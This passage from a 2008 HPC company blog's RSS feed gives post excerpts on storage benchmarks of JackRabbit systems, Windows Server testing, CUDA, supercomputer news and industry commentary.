      <title>Scalable Informatics 6% sale</title>
      <link>https://blog.scalability.org/2008/07/scalable-informatics-6-sales/</link>
      <pubDate>Tue, 01 Jul 2008 17:30:25 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/07/scalable-informatics-6-sales/</guid>
      <description>Day job (actually company) has been in business 6 years, and is having a 6% sale to celebrate! Basically, any hardware (including JackRabbits, our Pegasus many-core workstations, and HPC clusters) purchased and paid for in the month of July 2008 qualifies. Ping me if you would like info about any of these things.</description>
    </item>
    
    <item>
      <title>450 streaming clients, 3 machines and 3 Gb NICs</title>
      <link>https://blog.scalability.org/2008/06/450-streaming-clients-3-machines-and-3-gb-nics/</link>
      <pubDate>Mon, 30 Jun 2008 16:40:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/06/450-streaming-clients-3-machines-and-3-gb-nics/</guid>
      <description>So I built this thing called run.pl to run N simultaneous instances of a command. To use it, you type run.pl N the_command_you_want_to_run_N_times_simultaneously So if I want to run 10 uname&amp;rsquo;s on my laptop &amp;hellip;
landman@lightning:~$ ./run.pl 10 uname O[1]: Linux O[2]: Linux O[3]: Linux O[4]: Linux O[5]: Linux O[6]: Linux O[7]: Linux O[8]: Linux O[9]: Linux O[10]: Linux  Cool huh &amp;hellip; Ok. Now let&amp;rsquo;s see how many mplayers will swamp the NIC and CPU.</description>
    </item>
    
    <item>
      <title>Stream this ... no ... really ...</title>
      <link>https://blog.scalability.org/2008/06/stream-this-no-really/</link>
      <pubDate>Wed, 25 Jun 2008 04:45:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/06/stream-this-no-really/</guid>
      <description>Ok. I asked for pointers to free as in Libre video. Stuff we can use for testing streaming performance. And load the JackRabbit system, with multiple clients pulling these videos. So first you need a video server. Well, IIS can do it in windows, but as I have discovered, Apache 2.2.9 does a somewhat better job of serving media on Windows 2003. Not sure why yet, may look. So now we have the mpeg of &amp;ldquo;The Brain that wouldn&amp;rsquo;t die&amp;rdquo;.</description>
    </item>
    
    <item>
      <title>What happened to Youtube?  Why isn&#39;t it as good as Liveleak?</title>
      <link>https://blog.scalability.org/2008/06/what-happened-to-youtube-why-isnt-it-as-good-as-liveleak/</link>
      <pubDate>Wed, 25 Jun 2008 00:43:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/06/what-happened-to-youtube-why-isnt-it-as-good-as-liveleak/</guid>
      <description>Youtube used to be &amp;ldquo;the&amp;rdquo; video site. Yeah, there are lots of competitors out there now. Sort of like social networks for a while. But Youtube has an issue. Click on an embedded video in a web site or a blog, and it is at best a crap shoot as to whether you will get anything playing. Most of the time now, we don&amp;rsquo;t. This is true on Windows, on Linux, with the latest Flash.</description>
    </item>
    
    <item>
      <title>... and a quick bonnie session (still untuned)</title>
      <link>https://blog.scalability.org/2008/06/and-a-quick-bonnie-session-still-untuned/</link>
      <pubDate>Mon, 23 Jun 2008 03:46:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/06/and-a-quick-bonnie-session-still-untuned/</guid>
      <description>Again, 24 drive bay JackRabbit storage system.
Version 1.03 ------Sequential Output------ --Sequential Input- --Random- -Per Chr- --Block-- -Rewrite- -Per Chr- --Block-- --Seeks-- Machine Size K/sec %CP K/sec %CP K/sec %CP K/sec %CP K/sec %CP /sec %CP jrs8 32088M 511057 49 228336 35 1046117 91 514.5 0 ------Sequential Create------ --------Random Create-------- -Create-- --Read--- -Delete-- -Create-- --Read--- -Delete-- files /sec %CP /sec %CP /sec %CP /sec %CP /sec %CP /sec %CP 16 21727 95 +++++ +++ 25751 99 22791 99 +++++ +++ 21702 98 jrs8,32088M,,,511057,49,228336,35,,,1046117,91,514.</description>
    </item>
    
    <item>
      <title>Trial run of JackRabbit-M</title>
      <link>https://blog.scalability.org/2008/06/trial-run-of-jackrabbit-m/</link>
      <pubDate>Sun, 22 Jun 2008 20:59:12 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/06/trial-run-of-jackrabbit-m/</guid>
      <description>Now that I have run through the 32 bit windows portion of the benchmark for the customer, I want to compare to our default way of shipping the units. So I fired up our default CF load, rebuilt the RAID. Simple little test runs, nothing to see here (no tuning yet)
The really simple minded tests &amp;hellip; how quickly can we pull from the disk and the buffer cache.
root@jrs8:~/mdadm-2.6.6# hdparm -tT /dev/md0 /dev/md0: Timing cached reads: 8862 MB in 2.</description>
    </item>
    
    <item>
      <title>W2k3 impressions day 2</title>
      <link>https://blog.scalability.org/2008/06/w2k3-impressions-day-2/</link>
      <pubDate>Sun, 22 Jun 2008 19:15:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/06/w2k3-impressions-day-2/</guid>
      <description>Ok, now I know why Microsoft has been working so hard on W2k8. Because W2k3 doesn&amp;rsquo;t scale well under load. Using our test rigs, and the apache &amp;ldquo;ab&amp;rdquo; program, we can see huge differences in the same hardware (literally the same, simply swapping out boot drives), between W2k8 and W2k3, with the latter barely able to eke out 60% of the theoretical max.
With W2k8, we were getting about 1 GB/s (8Gb/s) out of the unit with 10 clients running ab (specifically &amp;lsquo;ab -c 1 -n 100 -v 1 http://192.</description>
    </item>
    
    <item>
      <title>W2k3 vs W2k8 first impressions</title>
      <link>https://blog.scalability.org/2008/06/w2k3-vs-w2k8-first-impressions/</link>
      <pubDate>Sat, 21 Jun 2008 20:56:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/06/w2k3-vs-w2k8-first-impressions/</guid>
      <description>W2k8 was not hard to install. Actually it was almost easy. Administration wasn&amp;rsquo;t hard. Most things went right on. Performance was ok. W2k3 was a royal pain to install, and I am not done yet. Administration &amp;hellip; well, between the network adapters which, after being told to use a fixed IP address, seem to still wish to acquire an IP address, to the IIS which refuses to install unless the SP2 CD is available (this is W2k3 SP2 BTW) &amp;hellip;</description>
    </item>
    
    <item>
      <title>Figured out the BSOD for W2k3 Server</title>
      <link>https://blog.scalability.org/2008/06/figured-out-the-bsod-for-w2k3-server/</link>
      <pubDate>Sat, 21 Jun 2008 17:47:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/06/figured-out-the-bsod-for-w2k3-server/</guid>
      <description>This was annoying. Let the record show that W2k3 server doesn&amp;rsquo;t grok AHCI. So if you are trying to install it and it BSODs on you, turn off AHCI and redo your boot drive config in bios. Yeah, you give up performance, and a better interface. But it will boot now, without crashing.</description>
    </item>
    
    <item>
      <title>JackRabbit too fast for windows ...</title>
      <link>https://blog.scalability.org/2008/06/jackrabbit-too-fast-for-windows/</link>
      <pubDate>Thu, 19 Jun 2008 19:24:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/06/jackrabbit-too-fast-for-windows/</guid>
      <description>&amp;hellip; or there is a bug in the performance monitor. While I would like to believe the former (that JackRabbit is too fast), the latter is likely true. Look at this image, and then see the highlighted second image. Discussion in a moment.
[ ](http://scalability.org/images/Screenshot-1.png)
and
[ ](http://scalability.org/images/Screenshot-small-1.png)
What&amp;rsquo;s that? -1.97 GB/s? So this is running IOmeter. We are seeing about 1.15 GiB/s sustained, +/- a bit. Bouncing all over the place though.</description>
    </item>
    
    <item>
      <title>&#34;But you can&#39;t do that!&#34;</title>
      <link>https://blog.scalability.org/2008/06/but-you-cant-do-that/</link>
      <pubDate>Wed, 18 Jun 2008 13:37:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/06/but-you-cant-do-that/</guid>
      <description>About 3 years ago, I was at a Sun HPC consortium meeting, where there was excitement over the possibility of getting 1TFLOP into 2.5 racks with an ultra-dense server. This was cool. It was awesome. One of the conference organizers was talking to me about this, saying it was the densest possible system (at that time). Having just been through the accelerator card high level design process for a business plan/company concept we were pitching to VCs, I innocently (ok, well, not so innocently) asked &amp;hellip; &amp;ldquo;Well, what if you could get a real sustainable 1TFLOP in a 4U box?</description>
    </item>
    
    <item>
      <title>Windows 2008 drivers, benchmarking, and loading of the drives/network</title>
      <link>https://blog.scalability.org/2008/06/windows-2008-drivers-benchmarking-and-loading-of-the-drivesnetwork/</link>
      <pubDate>Wed, 18 Jun 2008 05:01:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/06/windows-2008-drivers-benchmarking-and-loading-of-the-drivesnetwork/</guid>
      <description>Happily, the Intel site has the right drivers for Windows 2008 for the motherboard gigabits. Just ordered some additional quad cards and a better network switch so we can push this harder. With 4 gigabit clients, we are seeing about 3.5x a single GbE port in bandwidth. Working on it. Our test is incredibly simple. Set up IIS7 to serve files from a directory. Create 100 files of 100 MB each. System has 4 GB RAM (ok, more than that, but it is running the 32 bit version of windows 2008, so all it sees is 4 GB).</description>
    </item>
    
    <item>
      <title>Name and logo generator for your startup! Get &#39;em while they&#39;re hot!</title>
      <link>https://blog.scalability.org/2008/06/name-and-logo-generator-for-your-startup-get-em-while-theyre-hot/</link>
      <pubDate>Wed, 18 Jun 2008 03:16:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/06/name-and-logo-generator-for-your-startup-get-em-while-theyre-hot/</guid>
      <description>Too funny &amp;hellip;</description>
    </item>
    
    <item>
      <title>Agglomeration of news</title>
      <link>https://blog.scalability.org/2008/06/agglomeration-of-news/</link>
      <pubDate>Tue, 17 Jun 2008 12:10:36 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/06/agglomeration-of-news/</guid>
      <description>First, by now you have heard Tesla-10 is out. This is a significant performance step up, and I believe it has double precision capability. This is a hardware acceleration platform. Roadrunner hit the PetaFLOP regime. What is important about this is that it did it at a lower power than many had predicted a PetaFLOP would require, and did it somewhat sooner than others had been predicting. This is an accelerated supercomputer, using Cell technology.</description>
    </item>
    
    <item>
      <title>Secure remote desktop with stunnel</title>
      <link>https://blog.scalability.org/2008/06/secure-remote-desktop-with-stunnel/</link>
      <pubDate>Sun, 15 Jun 2008 16:42:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/06/secure-remote-desktop-with-stunnel/</guid>
      <description>This is nice. We have set up a secure remote desktop with Stunnel for Windows 2008 server on JackRabbit M. Vijay is working on doing some setup for our benchmarks, and I wanted a way to give him access while he works remotely. Sure enough, setup wasn&amp;rsquo;t too painful, simply follow directions at this link. Still have to order extra NICs and a new gigabit switch, but otherwise we are about ready to load test &amp;hellip;</description>
    </item>
    
    <item>
      <title>What he said!</title>
      <link>https://blog.scalability.org/2008/06/what-he-said-2/</link>
      <pubDate>Fri, 13 Jun 2008 15:01:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/06/what-he-said-2/</guid>
      <description>Up early on a Friday morning, working through today&#39;s issues and &amp;hellip; found this article on Linux Magazine by the esteemed Doug Eadline. I was in on the discussion that he refers to, and pointed out that you do in fact get what you pay for, and that you will not get an engineered system in many cases. Worse, the configs will likely be those that minimize vendor costs, as that is the problem they are attempting to solve in a low margin business (clusters).</description>
    </item>
    
    <item>
      <title>SUA impressions</title>
      <link>https://blog.scalability.org/2008/06/sua-impressions/</link>
      <pubDate>Fri, 13 Jun 2008 01:42:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/06/sua-impressions/</guid>
      <description>A while ago, I had been advised to try SUA as part of windows. I was told it was much better than cygwin, and it is supported by Microsoft. Stuff will work, I was told. Well, of these statements, I can say I believe &amp;ldquo;supported by Microsoft&amp;rdquo; is probably the true one. Pulled down bonnie tarball. Tried to compile it. No luck. Pulled down IOzone tarball. Tried to compile it. No luck.</description>
    </item>
    
    <item>
      <title>Darned thing BSODs right away ...</title>
      <link>https://blog.scalability.org/2008/06/darned-thing-bsods-right-away/</link>
      <pubDate>Thu, 12 Jun 2008 19:35:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/06/darned-thing-bsods-right-away/</guid>
      <description>There we are, trying to use W2k3 server for the customer benchmark on JackRabbit. So we install it &amp;hellip; or try to install it and &amp;hellip; BSOD (growl)
No, I am not going to tear into Windows on this. W2k3 is an old software kit. Yes, I did hit F6 to try to fix it, and add drivers. No, it never got to the point of letting me. Won&amp;rsquo;t spend more time on this.</description>
    </item>
    
    <item>
      <title>Desktop snapshot of JackRabbit running Windows 2008 RC2</title>
      <link>https://blog.scalability.org/2008/06/desktop-snapshot-of-jackrabbit-running-windows-2008-rc2/</link>
      <pubDate>Wed, 11 Jun 2008 11:57:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/06/desktop-snapshot-of-jackrabbit-running-windows-2008-rc2/</guid>
      <description>Why not. JackRabbit-M (24 bay unit) running W2k8 RC2.
[ ](http://scalability.org/images/w2k8-JRM.png)</description>
    </item>
    
    <item>
      <title>More W2k8 thoughts on JackRabbit M</title>
      <link>https://blog.scalability.org/2008/06/more-w2k8-thoughts-on-jackrabbit-m/</link>
      <pubDate>Wed, 11 Jun 2008 11:44:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/06/more-w2k8-thoughts-on-jackrabbit-m/</guid>
      <description>So now you know that we are testing a unit with Windows 2008 on JackRabbit. Some of the things which struck me during this load were how initially simple the OS load appeared to be. It basically copied all it needed to the disk, rebooted, and installed. Ok, great. Except for the fact that it didn&amp;rsquo;t, by default, recognize the on-board NICs. This means that we need to either find a second network card, or get the NICs going on the motherboard.</description>
    </item>
    
    <item>
      <title>JackRabbit M on Windows 2008</title>
      <link>https://blog.scalability.org/2008/06/jackrabbit-m-on-windows-2008/</link>
      <pubDate>Wed, 11 Jun 2008 04:59:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/06/jackrabbit-m-on-windows-2008/</guid>
      <description>Testing a JackRabbit M (24 bay unit) with Windows 2008 RC2. Initial impressions are that the installation of 2008 isn&amp;rsquo;t bad at all, though it seems not to recognize things on the motherboard, like NICs. Administration is still painful &amp;hellip; things are spread out over multiple guis, and you have to struggle to get IE to behave the way you need it. So much so that Firefox 2.0.0.14 is now installed.</description>
    </item>
    
    <item>
      <title>Road runner on the test track: 1.026E15 FLOPs</title>
      <link>https://blog.scalability.org/2008/06/road-runner-on-the-test-track-1026e15-flops/</link>
      <pubDate>Mon, 09 Jun 2008 03:48:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/06/road-runner-on-the-test-track-1026e15-flops/</guid>
      <description>Yeah baby! The world&amp;rsquo;s fastest supercomputer is an accelerated (Cell-based) system. For those who can&amp;rsquo;t parse the number, 1.026E15 is 1.026 x 10^15, or 1.026 x 1 (followed by 15 zeros). 1 Million is 1E6 or Mega, 1 Billion is 1E9 or Giga (though I understand the UK and a few others use a different phrase &amp;hellip; thousand millions), 1 Trillion is 1E12 or Tera, and 1 Quadrillion is 1E15 or Peta.</description>
    </item>
    
    <item>
      <title>Microprocessor wars, episode 6</title>
      <link>https://blog.scalability.org/2008/06/microprocessor-wars-episode-6/</link>
      <pubDate>Fri, 06 Jun 2008 19:56:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/06/microprocessor-wars-episode-6/</guid>
      <description>When last we left young Luke ClusterDesigner, he was pondering whether or not to use one or the other vendor&amp;rsquo;s chips in the latest system they were to bid to customers for an RFP. Alas, along came one (then two) chip vendors offering &amp;ldquo;marketing support&amp;rdquo; (wink wink nudge nudge, say no more!) to young Luke. The farce was indeed strong with young Luke as he applied that &amp;ldquo;marketing support&amp;rdquo; to effectively reduce the cost of the processors he put into the cluster, thus decreasing the cost of the cluster for them to build.</description>
    </item>
    
    <item>
      <title>Ever have one of those days ...</title>
      <link>https://blog.scalability.org/2008/06/ever-have-one-of-those-days/</link>
      <pubDate>Tue, 03 Jun 2008 15:46:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/06/ever-have-one-of-those-days/</guid>
      <description>I mean, really, one of those days. If you don&amp;rsquo;t know what I mean, then, well, you haven&amp;rsquo;t had one, and cannot commiserate. I am having one of those days. My trusty Nokia E61 is in a cab somewhere in London. Not in the same part of London that I am in. Yeah, its been one of those days.
Remember, the Crackberry &amp;hellip; er &amp;hellip; blackberry 8830 world phone &amp;ldquo;isn&amp;rsquo;t&amp;rdquo; (that is, it doesn&amp;rsquo;t work here, with their GSM card, as they cannot or will not test it before they ship it).</description>
    </item>
    
    <item>
      <title>OT: phones</title>
      <link>https://blog.scalability.org/2008/06/ot-phones/</link>
      <pubDate>Mon, 02 Jun 2008 09:46:12 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/06/ot-phones/</guid>
      <description>So I have a Blackberry. I mentioned &amp;ldquo;cold-dead fingers&amp;rdquo; before. Crackberry is appropriate. It just works. And works really really well. That is, unless you have Verizon Wireless 8830 World phone. They issue you a GSM card. They activate it for you. What they can&amp;rsquo;t do before you leave? Test it.
I am over in the UK with a non-working BlackBerry 8830 phone. Don&amp;rsquo;t get me wrong, the phone (CDMA) works well in the US.</description>
    </item>
    
    <item>
      <title>In London updated</title>
      <link>https://blog.scalability.org/2008/06/in-london-updated/</link>
      <pubDate>Mon, 02 Jun 2008 09:38:11 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/06/in-london-updated/</guid>
      <description>Talking at a conference. Conference is about outsourcing and I am talking about HPC. Go figure. Old version of this was deleted. Somehow got corrupted. Navigation in London is &amp;hellip; well &amp;hellip; a challenge. Street signs would be a nice addition. They are often hard to find if they exist at all. Determining what street you are on, and what direction you are traveling in is also a challenge.
Getting ready to leave for the conference.</description>
    </item>
    
    <item>
      <title>What are people using to read this blog?</title>
      <link>https://blog.scalability.org/2008/05/what-are-people-using-to-read-this-blog/</link>
      <pubDate>Fri, 30 May 2008 20:03:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/05/what-are-people-using-to-read-this-blog/</guid>
      <description>I make a rough guess that they are using the same tools they are using on their desktops or laptops. It is a guess. This said, some interesting trends emerge from ~2 months of data and 2000-3000 visitors per day.
Visitors OS:
[visitors OS chart](http://scalability.org/images/visitors.png)
Browsers:
[browsers chart](http://scalability.org/images/browsers.png)
Search engines:
[search engines chart](http://scalability.org/images/search.png)
Ok, I am surprised. 21% of visitors appear to be using Linux. More surprising still: under 70% appear to be using Windows flavors.</description>
    </item>
    
    <item>
      <title>stability ... boring old and simple stability</title>
      <link>https://blog.scalability.org/2008/05/stability-boring-old-and-simple-stability/</link>
      <pubDate>Fri, 30 May 2008 19:17:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/05/stability-boring-old-and-simple-stability/</guid>
      <description>[xxx@yyy~]$ uptime
 15:07:51 up 505 days, 47 min, 14 users, load average: 0.39, 0.35, 0.19
[xxx@yyy~]$ uname -s
Linux
43.6 mega-seconds. For the pair of 1.6 GHz CPUs that are in here, this is a combined 1.4 x 10^17 clock cycles. Or for the chemists among us &amp;hellip; this is 0.23 micro-mole of clock cycles. You would need 4.3 million of these machines to provide one mole (6.022 x 10^23) cycles per year.</description>
    </item>
    
    <item>
      <title>A hint at things to come (in JackRabbit performance)</title>
      <link>https://blog.scalability.org/2008/05/a-hint-at-things-to-come-in-jackrabbit-performance/</link>
      <pubDate>Fri, 30 May 2008 05:53:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/05/a-hint-at-things-to-come-in-jackrabbit-performance/</guid>
      <description>Well, this is a machine going out to a customer later today. Numbers aren&amp;rsquo;t so bad. Will explain a little more in a moment.
root@pegasus-i:~# dd if=/dev/zero of=/local/data.file bs=8M count=1024
1024+0 records in
1024+0 records out
8589934592 bytes (8.6 GB) copied, 40.328 s, 213 MB/s
root@pegasus-i:~# dd if=/dev/zero of=/local/data.file bs=8M count=1024 oflag=direct
1024+0 records in
1024+0 records out
8589934592 bytes (8.6 GB) copied, 25.6982 s, 334 MB/s
root@pegasus-i:~# dd if=/local/data.file of=/dev/null bs=8M
1024+0 records in
1024+0 records out
8589934592 bytes (8.</description>
    </item>
    
    <item>
      <title>Next JackRabbit &#34;demo&#34; unit being built</title>
      <link>https://blog.scalability.org/2008/05/next-jackrabbit-demo-unit-being-built/</link>
      <pubDate>Thu, 29 May 2008 04:53:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/05/next-jackrabbit-demo-unit-being-built/</guid>
      <description>&amp;hellip; and already 2 groups want it for a month, and at least one other wants some benchmarks. Benchmarks we have agreed to run on it to date, including the usual suspects, as well as a windows server 2003 R2 file streaming BM, and some others. Some are asking us to test with various IB/10 GbE, do throughput studies, etc. There are a few new features which we will be running down over the next few weeks.</description>
    </item>
    
    <item>
      <title>You know you are old when ...</title>
      <link>https://blog.scalability.org/2008/05/you-know-you-are-old-when/</link>
      <pubDate>Wed, 28 May 2008 16:16:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/05/you-know-you-are-old-when/</guid>
      <description>your niece texts your wife over SMS, and she asks you &amp;ldquo;what does &amp;lsquo;KK&amp;rsquo; mean&amp;rdquo;, and you have to google it. Hit my superego where it hurts &amp;hellip;</description>
    </item>
    
    <item>
      <title>Thoughts on Ubuntu 8.04 LTS update</title>
      <link>https://blog.scalability.org/2008/05/thoughts-on-ubuntu-804-lts-update/</link>
      <pubDate>Sat, 24 May 2008 16:44:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/05/thoughts-on-ubuntu-804-lts-update/</guid>
      <description>Well, after using it 3 weeks on my laptop, I am underwhelmed. 7.10 was much better. Everything just worked and there were no crashes. From Firefox 3.0-beta5 which broke about 50% of my plugins, through the sudden hard locks with the Verizon cell card (the other system did not do this), to the still completely borked video driver bit. Just try to install a Cuda graphics driver. You have to edit /sbin/lrm-video and comment out its &amp;ldquo;intelligence&amp;rdquo; as the other published methods simply do not work.</description>
    </item>
    
    <item>
      <title>The economy of the future, and how not to create it</title>
      <link>https://blog.scalability.org/2008/05/the-economy-of-the-future-and-how-not-to-create-it/</link>
      <pubDate>Sat, 24 May 2008 15:11:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/05/the-economy-of-the-future-and-how-not-to-create-it/</guid>
      <description>Call this an object lesson in what not to do. Well, to be fair, the idea, the fundamental concept, is excellent. It is on target. It&amp;rsquo;s the implementation details that turn this good idea into a waste of time, effort, and money for those competing.
This is a post about Michigan, and its 21st century fund business plan competition. It is also a post about business conditions in the state. It is also a post about areas that Michigan is investing in, and areas it should be investing in (the two are not the same).</description>
    </item>
    
    <item>
      <title>high user load</title>
      <link>https://blog.scalability.org/2008/05/high-user-load/</link>
      <pubDate>Sat, 24 May 2008 13:41:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/05/high-user-load/</guid>
      <description>Sorry folks, been incredibly busy for last 3 weeks. Very little time to comment on anything. Email box full of stuff I am working through. Will get back into this early this coming week.</description>
    </item>
    
    <item>
      <title>Frightening vulnerabilities ...</title>
      <link>https://blog.scalability.org/2008/05/frightening-vulnerabilities/</link>
      <pubDate>Fri, 23 May 2008 21:00:57 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/05/frightening-vulnerabilities/</guid>
      <description>There was a bit of a kerfuffle last week over weak random number generators and SSL for Debian and Debian-based distributions. This vulnerability made it actually easy to crack a key generated with the OpenSSL code. Think about the basis for this risk. SSL is based upon hard to guess integers which are built out of &amp;ldquo;entropy&amp;rdquo; (the CS definition, not the physical definition) to ensure &amp;ldquo;randomness&amp;rdquo; of some sort, and then used to construct keys.</description>
    </item>
    
    <item>
      <title>Benchmarking</title>
      <link>https://blog.scalability.org/2008/05/benchmarking/</link>
      <pubDate>Sun, 18 May 2008 20:02:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/05/benchmarking/</guid>
      <description>I have long been a proponent of meaningful benchmarks. Meaningful benchmarks are those that can be used with a reasonable level of predictive power to help in sizing and other issues. I am also a proponent of market/institutional knowledge &amp;hellip; if you have been working in HPC for a while, you might have a clue as to how some systems run, some good design points, some really bad ideas (&amp;ldquo;hey lets run a cluster over pairs of SLIP lines&amp;rdquo;).</description>
    </item>
    
    <item>
      <title>Data size growth</title>
      <link>https://blog.scalability.org/2008/05/data-size-growth/</link>
      <pubDate>Fri, 16 May 2008 17:56:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/05/data-size-growth/</guid>
      <description>I don&amp;rsquo;t have any hard numbers on this, but we have been hearing from various sources that data sets and data sizes are doubling every 6 to 9 months just in the Life Sciences market. Still looking for sources for this, but this anecdotal data suggests problems with retention, management, backup, data motion, &amp;hellip;</description>
    </item>
    
    <item>
      <title>Designing to fail</title>
      <link>https://blog.scalability.org/2008/05/designing-to-fail/</link>
      <pubDate>Fri, 16 May 2008 17:45:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/05/designing-to-fail/</guid>
      <description>Every now and then we run into situations where someone just does not wish to succeed with their task or mission. Maybe they don&amp;rsquo;t like the mission, or the people, or the technology. They appear to be following the scope/plan of the mission, but their actions run counter to the goals that have been set out for them. Their ulterior motive is to set up the thing they were missioned to do to fail.</description>
    </item>
    
    <item>
      <title>Bonnie&#43;&#43; for deskside JackRabbit</title>
      <link>https://blog.scalability.org/2008/05/bonnie-for-deskside-jackrabbit/</link>
      <pubDate>Fri, 16 May 2008 05:37:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/05/bonnie-for-deskside-jackrabbit/</guid>
      <description>This is a 15 drive JackRabbit unit (under $6500 USD the way we have it configured), where we carved 2 drives out for OS, and built a RAID6 across 12 drives, with 1 hot spare. Just finished the other tests. Pretty pleased with the results. Still have to do driver and kernel updates, but I want a simple baseline test. So here it is.
root@crunch:~/jr# bonnie++ -d /big -u root -f
Using uid:0, gid:0.</description>
    </item>
    
    <item>
      <title>Testing the new deskside JackRabbit</title>
      <link>https://blog.scalability.org/2008/05/testing-the-new-deskside-jackrabbit/</link>
      <pubDate>Thu, 15 May 2008 15:15:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/05/testing-the-new-deskside-jackrabbit/</guid>
      <description>This unit will be (eventually) the replacement for our older central server at our new space (woo-hoo!!!!). Right now, taking to the test track as it were. Simple machine: 16 GB ram, 4 cores, 7.5 TB of raw storage. In a deskside case. Works well for offices. This configuration would be right about $5900 list. RAID6 with one hot spare would drop it to 6TB for storage. Carving out 2 drives for OS (as I did) would bring it down to 5TB.</description>
    </item>
    
    <item>
      <title>Handling (accidental?) DoSing</title>
      <link>https://blog.scalability.org/2008/05/handling-accidental-dosing/</link>
      <pubDate>Wed, 14 May 2008 15:59:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/05/handling-accidental-dosing/</guid>
      <description>We check logs to make sure things are working. Nothing like getting a huge number of failed requests to spoil your day. So some things stick out. Like 1 request per second for 10,000+ seconds from a single site. In this case, in France. Or a bot getting stuck in a calendar. Like the Microsoft bot. In the case of the former, it happened this morning. The easiest thing to do is simply to firewall them off.</description>
    </item>
    
    <item>
      <title>CUDA and acceleration</title>
      <link>https://blog.scalability.org/2008/05/cuda-and-acceleration/</link>
      <pubDate>Tue, 13 May 2008 16:45:57 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/05/cuda-and-acceleration/</guid>
      <description>Took a Cuda class. Installed Cuda on my laptop. Well, 1.1 on my laptop. It has a Cuda class GPU (one of the things I made sure of when I bought it). 2.0 is in beta, and I think I will use that. A few minor glitches getting it going.
That said, I have some simple impressions. Cuda is going to have significant market momentum by mid year. Unlike most of the other accelerator platforms, the SDK is free, and is easy to use.</description>
    </item>
    
    <item>
      <title>HP gobbles up EDS</title>
      <link>https://blog.scalability.org/2008/05/hp-gobbles-up-eds/</link>
      <pubDate>Tue, 13 May 2008 16:04:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/05/hp-gobbles-up-eds/</guid>
      <description>Looks like the rumored deal closed. HP now has a generally well regarded services team, with deep US government connections. Going to give IBM a run for its money. The question is whom else will tie up? And how? EDS isn&amp;rsquo;t an HPC vendor/provider, but HP is. Which suggests that if there is money to be made in &amp;ldquo;them thar hills&amp;rdquo; of HPC (and there is), that EDS may be retooling for this.</description>
    </item>
    
    <item>
      <title>a rainy sunday morning ... no Sun shine</title>
      <link>https://blog.scalability.org/2008/05/a-rainy-sunday-morning-no-sun-shine/</link>
      <pubDate>Sun, 11 May 2008 16:38:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/05/a-rainy-sunday-morning-no-sun-shine/</guid>
      <description>This post at Storage Soup eviscerates Sun&amp;rsquo;s moves in storage, and rips into thumper (x4500, which our JackRabbit competes with). Some of the writing mirrors some discussions I have had recently in terms of what has happened to Sun. Where are they going? What are they doing?</description>
    </item>
    
    <item>
      <title>long standing bugs ...</title>
      <link>https://blog.scalability.org/2008/05/long-standing-bugs/</link>
      <pubDate>Sun, 11 May 2008 05:09:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/05/long-standing-bugs/</guid>
      <description>Just updated laptop to Ubuntu 8.04. This is a Dell dual core unit, and while the phrase &amp;ldquo;remove it from my cold dead fingers&amp;rdquo; comes to mind (yeah, it is pretty good), some things in the new release don&amp;rsquo;t work well. Ok, well they do work better than before. But some of the &amp;ldquo;helper&amp;rdquo; bits are horribly broken. Suppose you want to install Cuda on this laptop (I did). And you want the new model Cuda aware driver (I did).</description>
    </item>
    
    <item>
      <title>Ouch ... HPC and IT companies quarterly results ...</title>
      <link>https://blog.scalability.org/2008/05/ouch-hpc-and-it-companies-quarterly-results/</link>
      <pubDate>Thu, 08 May 2008 00:37:52 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/05/ouch-hpc-and-it-companies-quarterly-results/</guid>
      <description>Well, there is an economic slowdown going on, so we shouldn&amp;rsquo;t be surprised when Intel and Microsoft post slightly lower earnings. Some HPC companies are getting hammered though. SGI just announced earnings, or more correctly, losses for the quarter. You can read it online at Yahoo finance and others. They lost 14% today. Down into the $7/share region. ClearSpeed, who I have talked about before, is being hammered. See their graph (also at Yahoo finance)</description>
    </item>
    
    <item>
      <title>JackRabbit updates</title>
